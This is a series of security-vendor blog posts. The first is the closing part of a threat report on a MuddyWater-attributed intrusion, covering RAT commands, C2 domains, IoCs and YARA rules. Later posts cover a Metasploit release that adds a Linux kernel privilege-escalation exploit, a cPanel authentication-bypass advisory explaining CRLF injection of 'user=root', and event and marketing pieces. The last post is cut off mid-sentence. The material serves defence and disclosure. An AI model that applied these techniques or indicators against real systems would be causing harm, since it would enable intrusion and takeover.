The RAT decrypts its configuration using AES-256-GCM to extract the attacker’s C2 server hostname uploadfiler[.]com and port 443. The malware first registers the victim by sending registration information such as computer name, username, and privilege level to the /home endpoint. Once registered, it enters an infinite loop polling /index.php every 60 seconds. The RAT features 12 core capabilities including arbitrary command execution via hidden cmd.exe or encoded PowerShell sessions; file uploads with retry logic; file deletion; and the establishment of persistent interactive shells. Command results and execution status are reported back to the /profile endpoint. 

Command

Description

run_cmd

Execute command via cmd.exe 

run_powershell

Execute command via PowerShell 

upload

Write base64-encoded file

upload_chunk

Chunked file upload with append mode

delete_file

Delete a file

cmd_start

Start interactive cmd.exe shell

cmd_input

Send input to interactive shell

cmd_stop

Stop interactive shell

ps_start

Start interactive PowerShell

ps_input

Send input to PowerShell

ps_stop

Stop interactive PowerShell

re_register

Re-register with a new agent_id

Table 4: Supported commands of the RAT


The malware design is unorthodox, characterized by an inconsistent approach to concealment. While it utilizes XOR encoding (key: 0xAB) to hide specific anti-analysis strings, such as VM detection keys and sandbox-related DLL names, critical indicators like file paths, RAT command strings, and JSON registration formats are left in plaintext. 

This inconsistency extends to its interaction with the Import Address Table (IAT). While the malware dynamically resolves certain sensitive APIs at runtime, such as CreateMutexA, other highly suspicious functions like CreatePipe and CreateProcessA remain statically linked. Notably, the developer dynamically loads the Sleep API via GetProcAddress despite it already being statically imported in the IAT.

These architectural discrepancies suggest the author is likely an unseasoned developer. The mixture of static imports and visible strings provides significant telemetry for AV and EDR solutions to identify and stop the threat (confirmed during the incident response).

Similar to ms_upd.exe during the hunt on public malware sharing platforms, we were able to find another sample (SHA256 3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90), implementing the same logic as Game.exe but masquerading itself as WebView2.exe.

Attribution remains challenging due to the absence of specialized attack patterns or known APT delivery vectors, such as NSIS used by Chinese APTs:

However, the presence of a specific signing Certificate and work of other threat researchers made it easier.

Certificate

While the TA adopted the Chaos Ransomware brand to project a cybercriminal identity, the underlying infrastructure reveals a signature previously associated with infrastructure linked to the Iranian Ministry of Intelligence and Security (MOIS). The primary technical bridge to the APT group MuddyWater (Seedworm) is the code-signing certificate used to validate the malware samples.

During the analysis of the downloader (ms_upd.exe), we identified a consistent digital signature:

Field

Value

Name

Donald Gay

Issuer

Microsoft ID Verified CS AOC CA 02

Algorithm

sha384RSA

Thumbprint

B674578D4BDB24CD58BF2DC884EAA658B7AA250C

Serial Number

33 00 07 9A 51 C7 06 3E 66 05 3D 22 9B 00 00 00 07 9A 51

Status

Time-invalid (revoked shortly after deployment)

Table 5: Certificate details

The "Donald Gay" certificate is a known shared resource within MuddyWater’s toolkit. Alongside its frequent companion, "Amy Cherne," this identity forms a distinct cluster of Iranian MOIS-affiliated infrastructure. According to threat intelligence reports from March and April 2026, this specific certificate has been tied directly to MuddyWater’s "Operation Olalampo," a campaign targeting organizations across the U.S. and the MENA (Middle East and North Africa) regions. Historically, this identity was also used to sign Stagecomp (ms_upd.exe), a downloader for the Darkcomp backdoor (Game.exe), both of which are firmly attributed to MuddyWater by multiple global security vendors.

Beyond the certificate, other technical artifacts solidify this attribution:

  • Infrastructure overlap: The domain moonzonet[.]com, which served as the C2 for ms_upd.exe, was linked to MuddyWater in early 2026 during a wave of activity targeting Israeli and Western organizations.

  • Execution tradecraft: The group’s signature use of pythonw.exe to inject code into suspended processes remains a consistent hallmark of their deployment chain.

  • Social engineering technique: The use of interactive Microsoft Teams sessions to harvest MFA and credentials aligns closely with the "IT Support" persona MuddyWater has refined throughout 2026.

Attribution: The "Chaos" masquerade

The convergence of technical and contextual evidence is consistent with attribution to MuddyWater with moderate confidence. The observed use of Chaos ransomware does not indicate a shift in the group’s underlying objectives, but rather reflects a consistent effort to obscure operational intent and complicate attribution. While attribution evasion is a common characteristic of state-affiliated actors, MuddyWater’s reported increase in operational activity as of early 2026, primarily involving cyber espionage and potential prepositioning for disruptive operations across Western and Middle Eastern networks, has likely intensified its reliance on deceptive false-flag operations.

This assessment aligns with previously observed behavior. In late 2025, MuddyWater was linked to activity involving the Qilin RaaS ecosystem in an operation targeting an Israeli organization. Following the subsequent public attribution of that incident to the MOIS, it is plausible that the group adopted alternative ransomware branding, in this case Chaos, in an effort to reduce attribution risk and maintain a degree of plausible deniability.

The use of a RaaS framework in this context may enable the actor to blur distinctions between state-sponsored activity and financially motivated cybercrime, thereby complicating attribution. Furthermore, the inclusion of extortion and negotiation elements could serve to focus defensive efforts on immediate impact, likely delaying the identification of underlying persistence mechanisms established via remote access tools such as DWAgent or AnyDesk.

Notably, the apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a deviation from typical ransomware behavior. This inconsistency may indicate that the ransomware component functioned primarily as a facilitating or obfuscation mechanism, rather than as the primary objective of the intrusion. This deviation highlights a mismatch between typical profit-driven ransomware behavior and the actor’s apparent espionage objectives. It further suggests a likely explanation for the inconsistent data provided by the TA as an initial proof-of-compromise. 

Taken together, these technical indicators and procedural inconsistencies are indicative of a targeted, state-sponsored intrusion masquerading as opportunistic extortion activity.

Conclusion

This incident highlights the increasing convergence between state-sponsored intrusion activity and cybercriminal tradecraft. While the operation incorporated recognizable elements of ransomware campaigns, such as extortion messaging and leak site publication, the absence of encryption and the presence of established espionage techniques suggest that financial gain was unlikely to be the primary objective.

The assessed link to MuddyWater indicates a continued evolution in the group’s operational approach, including the apparent use of RaaS ecosystems and branding to obscure attribution. This aligns with broader trends in which state-aligned actors adopt criminal tactics to introduce ambiguity and delay defensive response.

This case underscores the importance of looking beyond overt ransomware indicators. Defenders should also focus on the underlying intrusion lifecycle. Techniques such as social engineering via enterprise communication platforms, credential harvesting with MFA manipulation, and the abuse of legitimate remote access tools remain critical enablers of compromise.

Ultimately, this activity is best understood as a hybrid intrusion model, in which ransomware is leveraged not as an end goal but as a mechanism for concealment, coercion, and operational flexibility within a broader intelligence-driven campaign.

For additional blog posts and detailed analysis from Rapid7 Labs on all things cyber-related to the conflict, please visit our Iran Conflict Cyber Threat Intelligence Hub.

Rapid7 Customers

Indicators of compromise (IoCs)

File indicators

File Name

SHA 256

Description

ms_upd.exe

24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14

Initial Downloader ms_upd.exe

DIDS.exe

a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0

Initial Downloader found during hunt on public repositories

Game.exe

1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6

RAT found during hunt on public repositories

WebView2.exe

3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90

RAT

visualwincomp.txt

c86ab27100f2a2939ac0d4a8af511f0a1a8116ba856100aae03bc2ad6cb0f1e0

Encrypted config holding C2 url and port information

WebView2Loader.dll

a47cd0dc12f0152d8f05b79e5c86bac9231f621db7b0e90a32f87b98b4e82f3a

DLL downloaded by ms_upd.exe

dwagent.exe

cd098eddb23f2d2f6c42271ca82803b0d5ac950cb82a9b8ae0928e83945a53df

Remote Management Tool leveraged by the TA

dwagent.exe

cf3dfd1d6626fd2129abb7a5983c11827f4b0d497e2dba146a1889bd71f23cd5

Renamed pythonw.exe

dwagsvc.exe

a3bac548b5bc91c526b4d6707623ddbd1a675aa952f0d1f9a0aa6f7230f09f23

Service binary of DWService

dwaglnc.exe

86e0197389f0573eb83ff53991f337d416124c7c8bd727721ef3d396cd5f65dc

Background and system tray binary of DWService

AnyDesk.exe

bfc1675ee1e358db8356f515aaded7962923e426aa0a0a1c0eddfc4dab053f89

Remote Management Tool leveraged by the TA

Network indicators

Indicator

Description

adm-pulse[.]com

Quick Assist themed phishing website

moonzonet[.]com

URL hosting a second stage RAT Game.exe

uploadfiler[.]com

C2 extracted from a config file visualwincomp.txt

77.110.107[.]235

Source IP address of malicious Microsoft Teams activity

93.123.39[.]127

Source IP address of malicious Microsoft Teams activity

172.86.126[.]208

C2 hosting initial downloader ms_upd.exe

116.203.208[.]186

IP contacted by renamed pythonw.exe

hptqq2o2qjva7lcaaq67w36jihzivkaitkexorauw7b2yul2z6zozpqd[.]onion

Chaos RaaS DLS

MITRE ATT&CK techniques

ATT&CK ID

Name

Use

T1566

Phishing (Spearphishing via Service)

Initial access via Microsoft Teams messages and social engineering

T1059

Command and Scripting Interpreter

Execution of discovery commands (ipconfig, whoami, etc.)

T1082

System Information Discovery

Gathering host-level information from compromised machines

T1016

System Network Configuration Discovery

Identifying network configuration via commands like ipconfig

T1078

Valid Accounts

Use of harvested credentials for authentication and access

T1056

Input Capture

Users entering credentials into attacker-directed files/pages

T1556

Modify Authentication Process

MFA manipulation to add attacker-controlled devices

T1021.001

Remote Services: RDP

Remote access to internal systems via RDP sessions

T1219

Remote Access Tools

Use of DWAgent and AnyDesk for persistence and control

T1543

Create or Modify System Process

Installation of DWAgent as a service

T1055

Process Injection / Proxy Execution

Abuse of renamed Python binary for execution

T1105

Ingress Tool Transfer

Downloading payloads via curl (ms_upd.exe)

T1041

Exfiltration Over C2 Channel

Data exfiltration to external infrastructure

T1027

Obfuscated/Encrypted Files or Information

Encrypted configuration (visualwincomp.txt)

T1497

Virtualization/Sandbox Evasion

Anti-VM checks in Game.exe

T1622

Debugger Evasion

Evasion techniques to avoid analysis

T1071

Application Layer Protocol

C2 communication over web protocols

T1573

Encrypted Channel

Encrypted communication with C2 infrastructure

T1133

External Remote Services

VPN access using compromised accounts

T1087

Account Discovery

Identifying user accounts via commands

T1018

Remote System Discovery

Enumerating systems in the network

YARA rules

rule MuddyWaterRAT{

	meta:
		author = "Ivan Feigl ivan_feigl@rapid7.com"
		description = "Hunting rule for the RAT used by the MuddyWater, based on plain text string. Original sample MD5 F8560B9A893EEB2130FC7159E9C1B851"

strings:


		//TKP - Token privilege 
		$TKP1 = "System"
		$TKP2 = "Admin"
		$TKP3 = "User"

        // DF - Data format
		$DF1 = "\"computer_name\":\""
		$DF2 = "\"username\":\"" 
		$DF3 = "\"domain\":\"" 
		$DF4 = "\"local_ip\":\"127.0.0.1\"" 
		$DF5 = "\"privilege\":\"" 
		$DF6 = "\"process_name\":\"agent-" 
		$DF7 = "\"version\":\"E.1.0\"" 
		$DF8 = "\"sleep_time\":60" 


        //IAT - Import address table
        $IAT1   = "GetComputerNameA"
        $IAT2   = "GetUserNameA"
        $IAT3   = "NetWkstaGetInfo"
        $IAT4   = "NetApiBufferFree"
        $IAT5   = "AllocateAndInitializeSid"
        $IAT6   = "OpenProcessToken"
        $IAT7   = "GetTokenInformation"
        $IAT8   = "EqualSid"
        $IAT9   = "CheckTokenMembership"

        //MSC - misc
        $MSC1 = "re_register"
        $MSC2 = "cmd_id"
        $MSC3 = "cmd_id"
        $MSC4 = "run_cmd"
        $MSC5 = "cmd_line"
        $MSC6 = "run_powershell"

		condition:
			uint16(0) == 0x5A4D  and all of($TKP*) and all of($DF*) and all of($IAT*) and all of ($MSC*) 
}

rule MuddyWaterDownloader{

	meta:
		author = "Ivan Feigl ivan_feigl@rapid7.com"
		description = "Hunting rule for the downloader used by the MuddyWater, based on plain text string. Original sample MD5 439C0A0A46627BD166E08436F383AD56"

	strings:


		//ST - Status
		$ST1 = "downloading"
		$ST2 = "running"
		$ST3 = "success"
		$ST4 = "error"

		//SFF - Scanf formats
		$SFF1 = "EXIT_%lu"
		$SFF2 = "RUN_%lu"
		$SFF3 = "DL_%s"

		//ICO - Internet communication operation 
		$ICO1 = "/register" ascii wide
		$ICO2 = "/check" ascii wide
		$ICO3 = "/status" ascii wide
        $ICO4 = "GET" ascii wide
        $ICO5 = "POST" ascii wide
        $ICO6 = "CONN_ERR" ascii wide
        $ICO7 = "REQ_ERR" ascii wide
        $ICO8 = "SEND_ERR" ascii wide
        $ICO9 = "RECV_ERR" ascii wide
        $ICO10 = "HTTP_%lu" ascii wide

        //FO - File operation
        $FO1 = "wb"
        $FO2 = "EMPTY"
        $FO3 = "FILE_ERR"

        // DF - Data format
        $DF1 = "\"client_id\":\"%s\""
        $DF2 = "\"status\":\"%s\""
        $DF3 = "\"error_code\":\"%s\""

        //IAT - Import address table
        $IAT1   = "GetLastError"
        $IAT2   = "Sleep"
        $IAT3   = "WinHttpOpen"
        $IAT4   = "WinHttpConnect"
        $IAT5   = "WinHttpOpenRequest"
        $IAT6   = "WinHttpSendRequest"
        $IAT7   = "WinHttpReceiveResponse"
        $IAT8   = "WinHttpReadData"
        $IAT9   = "WinHttpCloseHandle"
        $IAT10  = "DeleteFileA"



		condition:
			uint16(0) == 0x5A4D  and all of($ST*) and all of($SFF*) and all of($ICO*) and all of ($FO*) and all of ($DF*) and all of ($IAT*)
}

A Walkthrough of the 2026 Global Cybersecurity Summit Agenda

5 May 2026 at 08:20

The full agenda for the Rapid7 2026 Global Cybersecurity Summit is now live, and it gives a clearer sense of how the conversation around security operations is evolving.

Across two days, the sessions progress from a shared understanding of how threats are changing into a more detailed look at how teams detect, respond, and make decisions in practice.

Day 1: How threats evolve and how teams respond

The day opens with a keynote, Defense Starts Earlier Than You Think, where Brian Castagna is joined by Craig Robinson, Research Vice President at IDC, to examine why complexity has become the main barrier to effective security and what changes when teams start acting earlier.

That context carries into The Reality of Running a SOC in 2026, featuring Raj Samani alongside Rachel Tobac, CEO of SocialProof Security, and Graham Cluley, cybersecurity speaker and podcast host. The discussion focuses on how attacks actually begin, from identity misuse to cloud misconfigurations, and why defenders often fall behind as those attacks evolve.

In Customer Panel: How Clarity Beats Complexity, leaders including Debby Briggs, CISO at Netscout Systems, Raheem Daya, Chief Technology Officer at Target RWE, and Will Lambert from Culligan International share how they are simplifying their environments and focusing on outcomes rather than activity.

From there, Inside the Modern SOC: Who Carries You Through an Incident walks through a real investigation step by step, showing how alerts are triaged, decisions are made, and outcomes are shaped under pressure.

The conversation then turns to AI in The AI Dilemma: Automating Defense Without Surrendering Judgment, where the role of AI in the SOC is examined through the lens of trust, transparency, and how it supports analyst decision-making in practice.

In Beyond the Vulnerability List, the focus shifts to exposure management, looking at how organizations are moving beyond static vulnerability tracking and using exposure as an early signal to guide detection and response.

That idea of validation continues in Using Red Teaming to Power Preemptive MDR, where continuous adversary testing is used to prove detection coverage and refine response workflows before an incident occurs.

The day also includes a short look at Rapid7: What’s New and What’s Next, connecting recent innovations across exposure management, MDR, and AI to how teams operate in practice.

The closing session, Persistence Under Pressure, introduces a different perspective. Former Special Forces operator Jason Fox draws on real-world experience to explore preparation, understanding the adversary, and how teams make decisions when conditions are less predictable.

Day 2: Strategy for leaders, execution for practitioners

The second day builds on that foundation, with two dedicated tracks designed around how security teams actually work.

For security leaders, The CISO’s Role in Enterprise Transformation brings together perspectives from Craig Robinson and Horst Moll, CISO at Miltenyi Biotec, to explore how the role of the CISO is evolving beyond technical leadership into broader organizational influence.

That is followed by How Exposure Insights Reframe Risk and Security Decisions, which looks at how leaders define priorities and align teams when exposure data is tied more closely to real-world risk.

In A CISO’s Guide to MDR Accountability and Outcomes, the focus moves to how effectiveness is measured, shifting from activity-based metrics toward outcomes that reflect business impact.

The leader track closes with Customer Panel: What CISOs Would Do Differently If Starting Today, featuring CISOs including Jonathan Chow of Genesys and Tony Arnold of TSB Bank, reflecting on what they would change or simplify based on experience.

For practitioners, Hunt or Be Hunted: Frontline Tales of Detection walks through a real incident, showing how analysts decide what to investigate and how signals are correlated across environments.

The New Rules of Detection Engineering builds on that with insights from Steve Edwards, Director of Threat Intelligence Detection Engineering, focusing on detection-as-code and how teams prioritize signals in practice.

In From Cloud Exposure to Runtime Attack, Shauli Rozen, CEO and Co-founder of ARMO, and Ben Hirschberg, CTO and Co-founder, walk through a cloud attack scenario to show how risks escalate and how they can be interrupted earlier.

The practitioner track closes with IR in Practice: Tools, Tradecraft, and Adversary-Informed Investigation, where Shanna Battaglia and Michael Cohen demonstrate how open-source tools and real-world workflows come together during incident response.

Register and join the conversations

Taken together, the agenda reflects a shift that runs through every session. Security operations are moving toward earlier decisions, better prioritization, and a clearer understanding of what matters in the moment.

If you want to see how that shift is playing out across strategy, detection, and response, this is where those conversations come together.

Join us May 12–13 and explore the full agenda in practice.

Register now.

Metasploit Wrap-Up 05/01/2026

MCP server

This release our very own cdelafuente-r7 finished implementing the Metasploit MCP Server (msfmcpd), bringing Model Context Protocol support to Metasploit Framework. MCP lets AI applications like Claude, Cursor, or your own custom agents query Metasploit data. Think of it as a middleware layer that exposes 8 standardized tools for searching modules and pulling reconnaissance data, all built on the official Ruby MCP SDK.

This first iteration is read-only, covering modules, hosts, services, vulnerabilities, and more. Tools for module execution, session interaction, and database modifications are on the roadmap for a future release. Full details are available in the documentation.

Copy Fail

Earlier this week, details of a new and high profile Linux LPE were released alongside a public PoC. The bug, nicknamed Copy Fail and identified by CVE-2026-31431, is a logic flaw in the cryptographic APIs exposed by the Linux Kernel. Metasploit has shipped a local exploit this week to leverage the flaw on AMD64 and AARCH64 targets with additional architectures planned for future releases. The exploit, which replaces the ‘su’ binary in the page cache with a small ELF file, allows users to specify command payloads for execution and will automatically determine the appropriate target architecture.

New module content (3)

Microsoft Windows HTTP to LDAP Relay

Author: jheysel-r7

Type: Auxiliary

Pull request: #21323 contributed by jheysel-r7

Path: server/relay/http_to_ldap

Description: This adds a new NTLM relay module that relays from HTTP to LDAP. On success, an authenticated LDAP session is opened which allows the operator to interact with the LDAP service in the context of the relayed identity.

Copy Fail AF_ALG + authencesn Page-Cache Write

Authors: Diego Ledda, Spencer McIntyre, Xint Code, and rootsecdev

Type: Exploit

Pull request: #21395 contributed by zeroSteiner

Path: linux/local/cve_2026_31431_copy_fail

AttackerKB reference: CVE-2026-31431

Description: Adds a module for CVE-2026-31431 (The Copy Fail LPE for Linux), a local privilege escalation affecting almost every Linux Kernel since 2017.

Linux Execute Command

Author: Spencer McIntyre

Type: Payload (Single)

Pull request: #21395 contributed by zeroSteiner

Path: linux/aarch64/exec

Description: Adds a module for CVE-2026-31431 (The Copy Fail LPE for Linux), a local privilege escalation affecting almost every Linux Kernel since 2017.

Enhancements and features (5)

Bugs fixed (0)

None

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Five Things we Took Away from Gartner SRM Sydney 2026

By: Rapid7
29 April 2026 at 19:00

At this year's Gartner Security and Risk Management Summit in Sydney, Rapid7 CISO Brian Castagna joined industry CISO Nigel Hedges for a fireside chat on the decisions security leaders are actually making right now. They discussed the real decisions being made right now about budgets, burnout, AI, and perspective on consolidation.

The conversation reinforced what we see across many organizations: SecOps is very much focused on protecting business resilience, enabling confident decisions by senior security leaders, and building programs that scale across people, platforms, and emerging technology. Let's now take a look at some of the main highlights from this year's Summit.

The business case for SecOps has shifted and boards are listening

The ‘invest in security or get breached’ pitch has run its course. Boards have heard it too many times; plus, it frames security as a cost center that only proves its value when something goes wrong.

We’re seeing it being replaced by a resilience narrative. In most incidents, the biggest business impact is operational disruption. Hours or days of downtime create immediate revenue loss, reputational damage, and perhaps worse still for some, regulatory exposure. CISOs who can connect their programs to that reality – translating incident data into business availability and financial risk – find it significantly easier to justify spend and shape investment decisions.

That shift in dynamic changes what gets measured and prioritized as well as how security leaders communicate upward to the board. Threat intelligence and kill chains still matter inside the SOC, but the ability to translate that to a clear risk narrative is fast becoming a leadership requirement in its own right.

Platform consolidation is growing, but it's not binary

The platform-vs-best-of-breed debate was notably pragmatic. The real question is how to strike the right balance: Consolidate where it improves efficiency and visibility, retain point solutions where they materially reduce a specific risk.

On the ground, budget pressure has accelerated this. Fewer vendors, more integrated telemetry, and clearer operational ownership help make spend more defensible. The discussion framed consolidation through the lens of ‘control planes’ (endpoint, gateway, network), with shared telemetry as the connective layer.

A real-world example grounded the conversation: Build a global security program for a 5,000-person organization across 40 countries on a $3 million budget, using a selective mix of MDR, PAM, EPM, and targeted point solutions only where necessary. Throughout, the operating principle was simple in that every security investment needs to answer one question: What risk does this reduce, and importantly, what business outcome does it protect?

People remain the most difficult element of SecOps

Technology and process can be engineered, but people? They’re much harder. That was one of the most practical observations from the session, and it resonated with every security leader in the room.

The challenge goes beyond hiring technical talent to ensure organizations are building teams with the right mix of communication skills, cognitive diversity, motivation, and endurance. A common gap seen in the SOC is that many teams are strong technically but few can articulate risk effectively to executives. That matters because the value of SecOps increasingly depends on how well teams connect activity to impact.

At the same time, burnout remains a structural issue. When experienced analysts leave, institutional knowledge leaves with them. And no tool can replace that. For leaders, this reinforces the point that people strategy is core to the overall security strategy.

AI in SecOps is getting very real, and very practical

After a long hype cycle, the AI conversation is now far more grounded. The most credible use cases in SecOps are about helping teams manage volume, reduce noise, and move faster with better context.

The examples discussed in the session were telling: alert-assisted triage, natural-language log querying, incident summarisation, first-draft executive communications, and eventually more automated investigation workflows. The framing that landed best was AI as a ‘sidearm partner’; a force multiplier for experienced practitioners, rather than a substitute for judgment.

That distinction matters as human judgment is essential. But AI is becoming increasingly valuable for understaffed teams trying to scale operations and preserve the institutional knowledge that walks out the door when analysts move on.

Governing agentic AI begins with foundations you should already have

As the discussion turned to agentic AI, the focus centred on how more autonomous AI systems do introduce new governance questions, but many of the relevant controls already exist within mature security programs. Segmentation, least privilege, access management, and strong architectural boundaries remain the core defenses.

One analogy stuck: Just as graphite rods slow a nuclear chain reaction, controls like network segmentation and access boundaries can contain and constrain agentic behavior. The organizations best positioned for AI governance are often the ones that have already invested in zero trust principles and sound identity controls.

That reframes the conversation. AI governance isn’t a separate discipline,  it’s the extension of existing security foundations into how AI systems behave, access data, and operate within defined boundaries.

What this means for the road ahead

If there was a unifying message, it was that the modern SecOps mandate is bigger than prevention. The industry has, to some extent, over-rotated on stopping threats and under-invested in resilience. 

Security leaders require programs that communicate risk in business terms, make smart technology trade-offs, support their people, and adopt AI in ways that are practical and governable. The organizations that get this right will be the ones building strong foundations and using the right mix of platform, process, and intelligence to move faster and more confidently. 
Rapid7 is committed to being a partner to organizations looking to gain that confidence. Our exposure-informed MDR service empowers teams to adopt a more preemptive security posture by rapidly identifying high-impact exposures that could be imminent breach targets. Teams can also leverage expanded capabilities in data security posture management (DSPM) and compliance to help fortify assessment, prioritization, and response capabilities so they can further preempt attacks across the modern attack surface.

CVE-2026-41940: cPanel & WHM Authentication Bypass

By: Rapid7
29 April 2026 at 16:00

Overview

On April 28, 2026, cPanel issued a security update to fix a critical vulnerability affecting the cPanel & WHM and WP Squared products. In the cPanel release notes, the bug was described as "an issue with session loading and saving." CVE-2026-41940, the identifier subsequently assigned on April 29, 2026, has a CVSS score of 9.8 and allows unauthenticated remote attackers to bypass authentication and gain unauthorized administrative access to the affected systems. First-party cPanel & WHM and WP Squared vendor advisories are available.

cPanel & WHM is web hosting control panel software used to manage websites and servers. WHM provides root-level administration, while cPanel acts as the user-facing interface. Successful exploitation of CVE-2026-41940 grants an attacker control over the cPanel host system, its configurations and databases, and websites it manages. A naive Shodan query for potential targets returns approximately 1.5 million cPanel instances exposed to the internet that may be vulnerable.

A managed cPanel host, KnownHost, stated that CVE-2026-41940 is actively being exploited in the wild, with speculation of targeted zero-day exploitation happening as early as February 23, 2026, prior to the vulnerability’s public disclosure. Security firm watchTowr has published a technical analysis and proof-of-concept exploit for CVE-2026-41940. As such, widespread exploitation in the wild is expected to be imminent.

Technical overview

Systems exposing the affected web service software are vulnerable by default.

As of April 29, 2026, a technical analysis and proof-of-concept exploit have been published by security firm watchTowr. CVE-2026-41940 is an authentication bypass caused by a Carriage Return Line Feed (CRLF) injection in the login and session loading processes of cPanel & WHM.

Before authentication occurs, `cpsrvd` (the cPanel service daemon) writes a new session file to the disk. The vulnerability allows an attacker to manipulate the `whostmgrsession` cookie by omitting an expected segment of the cookie value, avoiding the encryption process typically applied to an attacker-provided value. Attackers can inject raw `\r\n` characters via a malicious basic authorization header, and the system subsequently writes the session file without sanitizing the data. As a result, the attacker can insert arbitrary properties, such as `user=root`, into their session file. After triggering a reload of the session from the file, the attacker establishes administrator-level access for their token.

Mitigation guidance

Organizations running on-premise instances of cPanel & WHM or WP Squared should prioritize upgrading to a fixed version on an emergency basis. Some hosting providers have opted to temporarily institute workaround TCP port blocks for cPanel & WHM web services on ports 2083 and 2087. However, defenders are strongly advised to patch, rather than implement workarounds.

Affected Software:

The vendor states that all versions after 11.40 are affected, prior to the following available fixed versions.

  • cPanel & WHM 11.86.0 versions prior to fixed version 11.86.0.41
  • cPanel & WHM 11.110.0 versions prior to fixed version 11.110.0.97

  • cPanel & WHM 11.118.0 versions prior to fixed version 11.118.0.63

  • cPanel & WHM 11.126.0 versions prior to fixed version 11.126.0.54

  • cPanel & WHM 11.130.0 versions prior to fixed version 11.130.0.19
  • cPanel & WHM 11.132.0 versions prior to fixed version 11.132.0.29

  • cPanel & WHM 11.134.0 versions prior to fixed version 11.134.0.20

  • cPanel & WHM 11.136.0 versions prior to fixed version 11.136.0.5

  • WP Squared versions prior to fixed version 136.1.7

Please read the vendor advisory for the latest guidance.

Exposure Command, InsightVM, and Nexpose

Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-41940 with authenticated vulnerability checks available in the April 30, 2026 content release.

Updates

  • April 29, 2026: Initial publication.
  • April 30, 2026: Update mitigation guidance with additional fixed version numbers and change wording to reflect availability of vulnerability checks.

Experts on Experts: The 2026 Threat Landscape is Moving Faster than Defenders Expect

29 April 2026 at 08:27

This week on Experts on Experts, I’m joined by Christiaan Beek, Rapid7’s VP of Threat Analytics, to talk through what we’re seeing in the 2026 threat landscape and how it connects to recent research coming out of Rapid7 Labs.

We start with the report, but quickly move into what’s already playing out in active campaigns. What stands out is not a change in attacker technique, but the pace. Weak credentials, missing MFA, exposed services, and unpatched systems still drive most intrusions. What has changed is how quickly those conditions are identified and exploited, and that shift is forcing security teams to rethink how they prioritize and respond.

The window to act is disappearing

One of the clearest themes in the conversation is timing. The issue is no longer how many vulnerabilities exist, but how quickly they are being used. The gap between disclosure and exploitation has narrowed to a matter of days in many cases, which removes the buffer teams used to rely on.

At the same time, most intrusions still begin with familiar conditions. Identity and access remain consistent weaknesses, with missing MFA and exposed remote access continuing to provide reliable entry points. What has changed is how those weaknesses are used. Access is now packaged and sold through a broader ecosystem, which increases both the speed and scale of attacks.

Access, persistence, and trusted systems

We also look at how attacker behaviour is evolving beyond initial access. In some environments, the goal is no longer immediate disruption but long-term presence. That changes how teams should think about detection, because finding activity is only the starting point. Understanding how long access has existed and what has already happened becomes just as important.

At the same time, attacks are concentrating inside systems organizations rely on every day. Identity platforms, cloud environments, and collaboration tools are all becoming key targets. The challenge is that activity in these systems often looks legitimate, which makes it harder to distinguish between normal behaviour and something that requires investigation.

AI is accelerating what already works

AI is part of this shift, but not because it introduces entirely new attack paths. What it does is make existing techniques faster and easier to scale, particularly in areas like social engineering and reconnaissance. Attackers can generate and adapt campaigns quickly, while defenders are dealing with increasing volumes of data.

That creates a simple but important shift. Security teams are not falling behind because they lack tools, but because the timing of attacks has changed and their processes have not kept up. The focus now is on understanding exposure earlier, prioritizing what matters, and preparing actions in advance.

Watch the full episode below to hear Christiaan’s perspective on how these trends are evolving and what they mean for security leaders heading into 2026.

Get Motivated: What to Expect from Our Keynote at Rapid7's Global Cybersecurity Summit

28 April 2026 at 09:42

Security teams prepare for incidents every day. Alerts are tuned, playbooks are built, and processes are tested. But when something actually happens, the challenge shifts. It becomes not just about making decisions under pressure, but how well that preparation has set teams up to make the right decisions when things heat up.

At this year’s Rapid7 Global Cybersecurity Summit, Persistence Under Pressure explores that shift directly. Former Special Forces operator Jason Fox draws on real-world experience where timing, clarity, and execution all have immediate consequences, and shows how that mindset applies to modern security operations.

In our keynote talk Persistence Under Pressure, former Special Forces operator Jason Fox brings experience from environments where timing, clarity, and execution all have immediate consequences. His session looks at how that mindset translates into modern security operations, where teams are expected to act quickly, often without complete information.

The parallels are clear: Incidents do not unfold in controlled conditions. Signals compete for attention, priorities shift, and decisions need to be made in real time. What matters in those moments is not just having the right tools, but knowing how to stay focused and act with confidence.

This session explores practical ideas that apply directly to security teams, from how preparation shapes response to how understanding the adversary influences decision-making, and why composure and clarity can make the difference when pressure builds.

It also reinforces a broader theme running throughout the summit. Preemptive security operations are not only about detecting threats earlier but about enabling better decisions across the entire lifecycle, from preparation through to response and recovery.

If you are looking to understand how security operations are evolving, this session offers a different but valuable perspective. One that connects strategy and technology back to the people responsible for making it work.

Join us May 12–13 and hear how these principles apply in practice. Register now.

MDR Selection is a Partnership Decision

28 April 2026 at 04:00

Managed Detection and Response (MDR) is a cybersecurity service that combines human expertise and technology to detect, investigate, and respond to threats 24/7.

I write this as a Field CISO at Rapid7, but also as someone who has had to live with the operational reality of MDR on the customer side. I have seen what happens when a service is a black box, when technology and service drift apart, and when cost, retention, and accountability are misaligned. That experience shapes the view in this piece: MDR selection is not just about buying monitoring in isolation, but about choosing a partner that can help your team reduce risk and improve the way security operates over time.

When organisations evaluate MDR, they often start in the wrong place. The discussion begins with integration counts, dashboards, pricing tables, and increasingly bold claims about AI or dramatic reductions in alert volume. Those things all matter to a degree, but they are not the centre of the decision. The real question is whether you are choosing a provider that will work as a genuine partner, help you reduce risk over time, and strengthen the way your team operates when the environment becomes noisy, complex, or difficult to manage.

That matters because MDR is not a service that sits neatly off to one side of the security function. It becomes part of the operating model. It influences how visibility is created, how incidents are handled, how priorities are surfaced, and how much confidence a leadership team has in the people and processes around it. For that reason, I do not think MDR selection is primarily a tooling exercise. It is a partnership decision.

What poor MDR looks like in practice

